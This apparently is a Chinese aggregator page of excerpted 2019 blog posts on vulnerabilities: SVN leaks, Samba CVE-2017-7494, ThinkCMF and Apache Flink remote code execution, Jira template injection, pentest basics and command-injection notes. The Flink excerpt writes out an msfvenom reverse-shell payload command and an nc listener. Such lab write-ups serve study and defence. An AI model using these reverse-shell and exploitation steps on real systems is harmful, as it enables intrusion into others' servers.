漏洞

svn泄露漏洞

喜夏-厌秋 提交于 2019-12-05 09:23:29
在服务器上布署代码时。如果是使用 svn checkout 功能来更新代码,而没有配置好目录访问权限,则会存在此漏洞。黑客利用此漏洞,可以下载整套网站的源代码。 一、.svn 目录 使用svn checkout后,项目目录下会生成隐藏的.svn文件夹(Linux上用ls命令看不到,要用ls -al命令)。 svn1.6及以前版本会在项目的每个文件夹下都生成一个.svn文件夹,里面包含了所有文件的备份,文件名为 .svn/text-base/文件名.svn-base svn1.7及以后版本则只在项目根目录生成一个.svn文件夹,里面的pristine文件夹里包含了整个项目的所有文件备份 下面我以svn1.7及之后版本为例,讲解如何利用此漏洞下载整个网站源代码 二、分析.svn目录内容 我们看到的是一个名为 wc.db 的文件,用文本编辑器打开看到第一行有写 SQLite format 3 ,可以知道,这是一个SQLite数据库的文件,后面包含的信息,文本编辑器就先不看了。我们下载一个正经的SQLite查看软件来慢慢看-- SQLite Studio 。 在软件下载完之前,再看看此文件夹里的其他内容: entries和format文件里面,只有个数字12,没什么参考意义;wc.db-journal文件是空的,也没什么价值;tmp目录里面也是空的; pristine里面内容就多了

samba远程代码执行漏洞

陌路散爱 提交于 2019-12-05 03:18:10
漏洞版本: Samba 3.5.0之后到4.6.4/4.5.10/4.4.14 测试版本: CVE: CVE-2017-7494 漏洞描述 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。端口445。 触发条件 服务器打开了文件/打印机共享端口445 共享文件拥有访问以及写入权限 攻击者知道共享的目录路径 漏洞测试 测试环境 123 $ docker pull medicean/vulapps:s_samba_1启动环境$ docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1 msf攻击模块 https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb

渗透测试基础

烈酒焚心 提交于 2019-12-05 02:07:33
渗透测试基础 知识科普 脚本(asp ,php, jsp) html(css,js,html) HTTP协议 cms(B/S) MD5 肉鸡 抓鸡 Webshell 漏洞 一句话【木马】 提权 后门 跳板 旁站入侵 C段入侵 扫描1-255 全部网段的网站CMS情况 选择自己擅长入侵的CMS,这样才能更快速的实现C段入侵 扫描1-255全部网段的端口开放情况 先查询端口,选择自己擅长提权的网站来入侵,痛过端口提权 使用到的工具椰树,阿D网络工具包、 黑盒测试 黑盒测试不同于黑客入侵,并不等于黑站。黑盒测试考验的是综合的能力(OS、Datebase、Script、code、思路、社工) 白盒测试 :相对于黑盒测试,白盒测试基本是从内部发起的 灰盒测试:基于白盒测试与黑盒测试之间的一种产物 渗透测试介绍 渗透测试流程 明确目标 确定范围 确定规则 确定需求 信息收集 基础信息 系统信息 应用信息 版本信息 服务信息 人员信息 防护信息 漏洞探测 系统漏洞 Websever漏洞 web应用漏洞 其他服务端口漏洞 通信安全 漏洞验证 自动化验证 手工验证 登录猜测 业务漏洞验证 公开资源的利用 形成报告 按需整理 补充介绍 修补建议 信息整理 获取所需 整理渗透工具 整理收集信息 整理漏洞信息 信息分析 精确打击 绕过防御机制 定制攻击路径 绕过检测机制 攻击代码 信息搜集是关键

thinkcmf 渗透测试漏洞修复解决方案

吃可爱长大的小学妹 提交于 2019-12-05 01:46:21
近段时间发现很多APP程序用的是thinkcmf,此程序源码存在getshell漏洞,我们Sine安全紧急对此高危漏洞进行了分析和漏洞修复,攻击者可以通过构造特定的请求包get请求即可在远程服务器上执行任意脚本代码。 根据index.php中的配置,项目路径为application,打开 Portal 下的 Controller 目录,选择一个控制类文件。 发现他的父类为Common\Controller\HomebaseController。 在HomeBaseController中加入如下测试代码 ThinkPHP是一套基于MVC的应用程序框架,被分成三个核心部件:模型(M)、视图(V)、控制器(C)。 由于添加的代码在控制器中,根据ThinkPHP框架约定可以通过a参数来指定对应的函数名,但是该函数的修饰符必须为Public, 而添加的代码正好符合该条件。 可以通过如下URL进行访问,并且可以添加GET参数arg1传递给函数。 cmfx-master/?a=test_public&arg1=run%20success HomeBaseController类中有一些访问权限为public的函数,重点关注display函数.看描述就是可以自定义加载模版,通过$this->parseTemplate 函数根据约定确定模版路径,如果不符合原先的约定将会从当前目录开始匹配。

Android设备管理器漏洞分析!

China☆狼群 提交于 2019-12-04 22:22:13
一、漏洞描述 目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载。其实该漏洞早在去年底已被发现。(http://safe.ijiami.cn/) 注册为“设备管理器”的应用是无法被直接卸载的。只有取消激活“设备管理器”后才可以直接卸载。 木马可以利用Android设备管理器漏洞达到在设备管理器列表“隐身”的效果。这样用户就无法进去“取消激活”页面,从而达到无法卸载的目的。 二、影响版本 Android2.2以上(4.0,4.1,4.2) 三、漏洞原理 首先我们来看一下Settings app如何形成设备管理器列表的: 相关类: packages\apps\settings\src\com\android\settings\DeviceAdminSettings.java public class DeviceAdminSettings extends ListFragment { DevicePolicyManager mDPM; final HashSet<ComponentName> mActiveAdmins = new HashSet<ComponentName>(); final ArrayList<DeviceAdminInfo> mAvailableAdmins =

【漏洞复现】Apache Flink任意Jar包上传导致远程代码执行

老子叫甜甜 提交于 2019-12-04 20:07:04
前言 记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。 作者一直致力于小白都能看懂的漏洞复现过程,感谢大家们一路以来的支持! 致谢Cx01、丞相等表哥们。没有你们的帮助,没有这篇文章! 0x01 漏洞描述 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞. 影响范围:<= 1.9.1(最新版本) 可能是我测的比较少,成功的概率1.9版本比较高。 0x02 漏洞威胁等级 高危 可导致远程代码执行 0x03 漏洞复现 第一步生成payload msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar 名字可以任意取 第二步生成监听端口,这里我选择nc监听端口。 nc -lvp 8000 第三步上传payload 最后直接返回shell 接着执行命令 0x04 复现那些坑 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 没有钱的小哥哥,小姐姐们可以选择一个Sunny-ngrok 工具进行端口转发。 官方Sunny-ngrok教程 客户端工具下载地址 0x05 批量检测脚本 GitHub地址 脚本源码 """ auth: @l3_W0ng version

信息系统安全上线流程

拜拜、爱过 提交于 2019-12-04 20:01:36
  在系统投入生产前进行全面的安全测试,可以减少系统的安全风险,但是如何做好上线的前的安全测试需要制定一套流程和关键节点的把控、培训方,自上而下的推广方可落地实施。 1、安全测试   1> 安全基线     定制安全应用和系统平台层的安全基线,在上线前进行安全检查,确保安全基线符合标准。   2> 运行环境漏扫     对系统平台层进行漏洞扫描,包括操作系统、数据库、中间件等,中高危漏洞必须修复后方可上线。   3> 代码审计     借助代码扫描工具对代码进行白盒扫描,可以搭建平台又研发进行上传代码自行扫描,安全人员辅助修改,确保无中高危漏洞。   4> 应用层漏扫     上线前通过应用层扫描工具对应用进行扫描,由安全人员判断出非误报漏洞提交研发进行修复。   5> 渗透测试     主要针对应用进行人工渗透测试。   6> 复测     以上发现的问题完全修复后方可投入生产。 2、资产记录   在一些大型国企做安全服务中发现由于历史IP资产数目较大,新增IP资产没有得到有效记录,导致IP资产管理混乱,一些边缘IP无对应责任人,存在严重的安全隐患。因此在系统上线前将新增IP资产进行记录,并整理历史IP资产,维护一份完整的IP资产列表对后期应急响应、漏洞排查至关重要。 记录内容如下:可以对seMF进行二次开发进行资产管理系统   ip资产记录 IP 作用 操作系统版本 数据库版本

[转]Windows内存堆内容整理总结

无人久伴 提交于 2019-12-04 19:48:24
在系统安全研究中,堆,是一个极其重要的内存区域以及研究的热点。堆,区别于栈区、全局数据区以及代码区,它的主要作用是允许程序在运行时动态地申请某个大小的内存空间。本文将从宏观到微观,简单梳理总结一下Windows系统中的堆相关的知识以及常见的堆利用漏洞,主要参考了看雪的《0day》,方便自己后续的学习。 注:本文更多是自己的整理,已经有很多师傅更详细地介绍过Windows堆了。 Windows堆的历史 到目前为止,由于微软并没有完全公开Windows中堆管理的细节,所以现在对Windows下堆的了解都是基于技术爱好者、黑客、安全专家以及逆向工程师等的个人研究成果。这些前辈的努力工作,为我们留下了极其宝贵的研究资料。现在,我们已经可以基本清楚了部分Windows系统中的堆管理策略、与攻击相关的数据结构和算法等。此处,有几位技术精湛、贡献卓越的前辈值得我们铭记: Halvar Flake:2002年的Black Hat大会上,他在演讲“Third Generation Exploitation”中首次挑战Windows的堆溢出,并揭秘了堆中一些重要的数据结构和算法。 David Litchfield: David 在2004年的Black Hat上演讲的"Windows Heap Overflows"首次比较全面地介绍了Windows 2000平台下堆溢出地技术细节,包括重要数据结构

[漏洞复现]Jira存在未授权服务端模板注入远程代码执行

早过忘川 提交于 2019-12-04 15:10:48
0x01 漏洞描述 Jira是由Atlassian公司出品的一款项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 2019年7月12日根据安全情报得知Atlassian Jira Server和Jira Data Center存在服务端模板注入远程代码执行漏洞。成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令,从而获取服务器权限,严重危害网络资产 0x02 CVE编号 CVE-2019-11581 0x03 漏洞威胁等级 高危 0x04 影响范围 AtlassianJira 4.4.x AtlassianJira 5.x.x AtlassianJira 6.x.x AtlassianJira 7.0.x AtlassianJira 7.1.x AtlassianJira 7.2.x AtlassianJira 7.3.x AtlassianJira 7.4.x AtlassianJira 7.5.x AtlassianJira 7.6.x < 7.6.14 AtlassianJira 7.7.x AtlassianJira 7.8.x AtlassianJira 7.9.x AtlassianJira 7.10.x AtlassianJira 7

2019.11.14读书笔记

放肆的年华 提交于 2019-12-04 13:56:54
*** 测试后端组件* 一**:注入操作系统命令 大多数Web服务器平台发展迅速,现在他们已经能够使用内置的API与服务器的操作系统进行几乎任何必需的交互。如正确使用,这些API可帮助开发者访问文件系统,连接其他进程,进行安全的网络通信。但是,许多时候,开发者使用更高级的技术直接向服务器发送操作系统命令。但是,如果应用程序向操作系统传送用户提交的输入,那么就很可能会受到命令注入攻击,由此攻击者能够提交专门设计的输入,修改开发者想要执行的命令。 常用于发出执行系统命令的函数,如php中的exec和ASP中的wscript.shell函数,通常并不限制命令的可执行范围。 eg1: 通过Perl注入 eg2: 通过ASP注入 eg3: 通过动态执行注入 许多Web脚本语言支持动态执行在运行时生成的代码。这种特性允许开发者创建可根据各种数据和条件动态修改其代码的应用程序。 eg4: 查找OS 查找OS命令注入漏洞 0x02 查找动态执行漏洞 动态执行漏洞最常见于PHP,Perl等语言。但基本上,任何应用程序平台都可能会向基于脚本的解释器(有时位于其他后端服务器上)传送用户提交的输入。 防止OS命令注入: 防止OS命令注入漏洞的最佳方法是完全避免直接调用操作系统命令。 几乎所有Web应用程序所需要执行的每个任务都可以使用内置API完成,而且攻击者无法控制这些API,使其执行其他预料之外的命令